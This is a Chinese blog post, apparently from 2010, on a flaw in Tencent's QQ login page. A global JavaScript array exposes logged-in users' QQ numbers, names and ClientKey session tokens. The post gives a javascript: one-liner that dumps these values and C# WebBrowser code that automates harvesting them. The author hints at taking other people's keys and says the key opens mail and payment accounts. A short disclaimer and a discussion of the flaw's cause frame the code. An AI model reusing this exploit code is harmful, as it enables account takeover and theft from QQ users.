• 漏洞无处不在之窃取你的QQ信息


    申明

     以下在文章中出现的内容皆从技术角度探讨问题,请勿使用下文所提到的技术从事非法行为!

                                                                               Thursday, July 01, 2010 


    我的上一篇博客 《检测本地是否登录了指定QQ》 中介绍了通过QQ官方页面来获取已登陆QQ信息的方法,

    通过对QQ页面中js文件的研究,我们可以更进一步的获取到更多信息!

    下面我们就来一步一步分析下,

    首先来看一下上次文章中提到的js中的一个关键函数:

    hummer_loaduin()
    function hummer_loaduin(){
        q_aUinList.length
    =0;
        
    var P=q_hummerQtrl.DoOperation(1,g_vOptData);
        
    if(null==P)
        {  
    return }
        
    try{
            
    var M=P.GetArray("PTALIST");
            
    var T=M.GetSize();
            
    var O="";
            
    var F=document.getElementById("list_uin");
            
    for(var U=0;U<T;U++)
            {
                
    var C=M.GetData(U);
                
    var R=C.GetDWord("dwSSO_Account_dwAccountUin");
                
    var G="";
                
    var J=C.GetByte("cSSO_Account_cAccountType");
                
    var S=R;
                
    if(J==1)
                {
                    
    try{
                        G
    =C.GetArray("SSO_Account_AccountValueList");
                        S
    =G.GetStr(0)
                    }
                    
    catch(Q)
                    {}
                }
                
    var K=0;
                
    try{
                    K
    =C.GetWord("wSSO_Account_wFaceIndex")
                }
                
    catch(Q)
                {K
    =0}
                
    var L="";
                
    try{
                    L
    =C.GetStr("strSSO_Account_strNickName")
                }
                
    catch(Q)
                {L
    =""}
                
    var D=C.GetBuf("bufGTKey_PTLOGIN");
                
    var E=C.GetBuf("bufST_PTLOGIN");
                
    var I="";
                
    var A=E.GetSize();
                
    for(var N=0;N<A;N++)
                {
                    
    var B=E.GetAt(N).toString("16");
                    
    if(B.length==1)
                    {B
    ="0"+B}
                    I
    +=B
                }
                
    var H={uin:R,name:S,type:J,face:K,nick:L,key:I};
                q_aUinList[U]
    =H
            }
            
    switch(q_aUinList.length)
            {
                
    case 0:ptui_reportAttr(77430,false);break;
                
    case 1:ptui_reportAttr(77431,false);break;
                
    default:ptui_reportAttr(77432,false)
            }
        }
        
    catch(Q){}
    }

    我们注意函数中的这一句:var H={uin:R,name:S,type:J,face:K,nick:L,key:I}; 

    为什么要注意这一句呢,我们假设现在不清楚它的COM 是通过哪些接口哪些命名来获取QQ信息的,

    但一般来说看字面意思 uin即是QQ账号 name即是QQ用户名 key当然就是。。(呵呵,大家应该都知道了) 

     为什么要强调这句代码呢,不是为了来理解字面意思,而是先让大家认识下本文的主题“窃取你的QQ信息”

     下面先给大家介绍一个东西:

      ClientKey,

    想必很多人都知道这个东西,也不乏有很多人在网上讨论如何获取这个东西,不知道的同学们现在就要注意啦,

    ClientKey 是一个你QQ登陆成功后从服务器返回来的值,利用这个值可以使用你账号在QQ的所有应用(这里说的有点不大清楚,不过还是自己去查下吧), 

    比如:通过ClientKey 我就可以登陆你的拍拍账号,甚至是财付通账号,通过ClientKey 我不需要你的QQ号密码就能登录你的QQ邮箱


     好了,废话不多说,我们接着分析,说到了ClientKey,那么聪明的同学都想到了 ClientKey就对应上面的var H.key,

    var H的其他字段都不重要了,因为有了key的存在,

     好,继续看var H 这句代码的下面一句:q_aUinList[U]=H 

    大家猜猜 q_aUinList 会是什么呢, (呵呵,猜个鸟啊猜)  往上看,var q_aUinList=new Array();

    这下知道咯 ,原来 q_aUinList 是个数组对象哦,综合起来:

    for(var U=0;U<T;U++)

    {

     var H={uin:R,name:S,type:J,face:K,nick:L,key:I};

     q_aUinList[U]=H ;

    很明显咯,q_aUinList数组对象存放了当前电脑所有登陆成功的QQ号的信息了,这还不是最关键(猜到最关键的是什么了麽?)!

    最最最最关键的是, var q_aUinList  居然是一个全局变量,

    这也是漏洞的所在了,在js文件中既然var q_aUinList是一个全局变量,那么,引用这个js的网页都可以访问这个var q_aUinList变量了,

    恰恰我们的腾讯官方页面加载后首先就调用了上文说到的2个关键函数,也就是在调用过程中 var q_aUinList变量的值已经被赋好了,

    而且 而且这玩意还允许我们访问,既然你允许,那我就毫不客气的来访问一下咯:

    构造如下的javascript代码:

    javascript:for(var C=0;C<q_aUinList.length;C++){var D=q_aUinList[C];document.write(D.uin+","+D.name+","+D.key+"\r");}

    很简单的一句代码,大家试着在已打开的腾讯登陆页面地址栏输入这句代码试试:

    不出意料, q_aUinList 被我们遍历了,q_aUinList值被我们读取了,高潮结束了,QQ信息就这样被我们窃取了,哎!

     不要急,猴急的同学要骂我了,你这取还不是只能取自己的,那要如何取别人的呢,关于这个我也就不多解释了,我想会写程序的哥们都应该知道吧!

     为了测试还是给出一段代码:

    GetLoginedCache()
     /// <summary>
            
    /// 暴力
            
    /// </summary>
            
    /// <returns></returns>
           public List<LoginedInfo> GetLoginedCache()
           {
               
    string htmlText = browser.Document.Body.InnerText;
               List
    <LoginedInfo> qqlist = new List<LoginedInfo>();
               
    string jscript = "javascript:for(var C=0;C<q_aUinList.length;C++){var D=q_aUinList[C];document.write(D.uin+\",\"+D.name+\",\"+D.key+\"$\");}void(0);";
               browser.Navigate(jscript);
               
    string readText = browser.Document.Body.InnerText;
               
    while (readText==htmlText)
               {
                   readText 
    = browser.Document.Body.InnerText;
                   Application.DoEvents();
               }
               
    string[] sArry = Regex.Split(readText, "$");
               
    for (int i = 0; i < sArry.Length;i++)
               {
                   
    if (sArry[i] != "" && sArry[i].Contains(","))
                   {
                       
    string[] infos = Regex.Split(sArry[i], ",");
                       
    if(infos.Length==3)
                       {
                           qqlist.Add(
    new LoginedInfo(infos[0],infos[1],infos[2]));
                       }
                   }
               }
               
    return qqlist;
           }
           
    //var H={uin:R,name:S,type:J,face:K,nick:L,key:I};
           public class LoginedInfo
           {
               
    public LoginedInfo(string uin ,string name,string key)
               {
                   
    this.Uin = uin;
                   
    this.Name = name;
                   
    this.Key = key;
               }
               
    public string Uin{get;set;}
               
    public string Name{get;set;}
               
    public string Key{get;set;}
           }

    到此为止,文章也快结束了,我们来谈谈这到底算不算漏洞,为什么会发生这样的漏洞!

    首先,我个人认为这是一个漏洞,而且我个人还认为一个页面的小瑕疵都可以说是漏洞,更何况此!

    其实,漏洞产生的原因, 很明显因为q_aUinList出了安全问题, 我个人不懂js也不会写js,不知道js里有没有private,public约束,

    至少在我们的c#程序里,如果q_aUinList保存的是一个关键信息,它肯定不应该是public的,

    通过本次分析,其实我们可以看到js虽然好用,但并不一定安全,就算没有了q_aUinList变量保存QQ信息,只要页面能获取,那就有可能被非法用户获取!

    好了,说了这么多该结束了,文章只是自己在前一篇文章中分析xue.js是发现现在又补充的一篇文章,希望大家不要用来做坏事!

    ps:也希望我们的网络是安全的 

  • 相关阅读:
    用户在第二层,而你在第五层,深度玩转华为预测服务
    Docker启动PostgreSQL时创建多个数据库
    CORS跨源资源共享概念及配置(Kubernetes Ingress和Spring Cloud Gateway)
    HTTP Cookies知识-查看、发送、获取、返回
    Kubernetes ConfigMap详解,多种方式创建、多种方式使用
    示例讲解PostgreSQL表分区的三种方式
    Springboot WebFlux集成Spring Security实现JWT认证
    Bean初始化操作initMethod、@PostConstruct和InitializingBean
    Springboot集成Spring Security实现JWT认证
    Spring Data JPA的Audit功能,审计数据库的变更
  • 原文地址:https://www.cnblogs.com/cxwx/p/1769153.html
Copyright © 2020-2023  润新知